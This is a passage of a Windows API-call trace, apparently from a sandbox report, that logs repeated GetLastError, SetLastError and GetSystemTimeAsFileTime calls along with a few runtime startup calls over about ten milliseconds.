(dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.625] SetLastError (dwErrCode=0x0) [0201.625] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.626] SetLastError (dwErrCode=0x0) [0201.626] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.627] SetLastError (dwErrCode=0x0) [0201.627] GetLastError () returned 0x0 [0201.628] SetLastError (dwErrCode=0x0) [0201.628] GetLastError () returned 0x0 [0201.628] SetLastError (dwErrCode=0x0) [0201.628] GetLastError () returned 0x0 [0201.628] SetLastError (dwErrCode=0x0) [0201.628] GetLastError () returned 0x0 [0201.628] SetLastError (dwErrCode=0x0) [0201.628] GetLastError () returned 0x0 [0201.628] SetLastError (dwErrCode=0x0) [0201.628] GetLastError () returned 0x0 [0201.628] SetLastError (dwErrCode=0x0) [0201.628] GetLastError () returned 0x0 [0201.628] SetLastError (dwErrCode=0x0) [0201.628] GetLastError () returned 0x0 [0201.628] SetLastError (dwErrCode=0x0) [0201.628] GetLastError () returned 0x0 [0201.628] SetLastError (dwErrCode=0x0) [0201.629] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0201.629] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40c6ab) returned 0x0 [0201.629] GetLastError () returned 0x0 [0201.629] SetLastError (dwErrCode=0x0) [0201.629] GetLastError () returned 0x0 [0201.629] SetLastError (dwErrCode=0x0) [0201.629] GetLastError () returned 0x0 [0201.629] SetLastError (dwErrCode=0x0) [0201.629] GetLastError () returned 0x0 [0201.629] SetLastError (dwErrCode=0x0) [0201.629] GetLastError () returned 0x0 [0201.629] SetLastError (dwErrCode=0x0) [0201.629] GetLastError () returned 0x0 [0201.629] SetLastError (dwErrCode=0x0) [0201.629] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.630] SetLastError (dwErrCode=0x0) [0201.630] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.631] SetLastError (dwErrCode=0x0) [0201.631] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.632] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.632] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.632] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.632] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.632] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.632] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.632] GetLastError () returned 0x0 [0201.632] SetLastError (dwErrCode=0x0) [0201.632] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.633] GetLastError () returned 0x0 [0201.633] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.634] SetLastError (dwErrCode=0x0) [0201.634] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.634] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.635] SetLastError (dwErrCode=0x0) [0201.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.635] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.636] GetLastError () returned 0x0 [0201.636] SetLastError (dwErrCode=0x0) [0201.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: 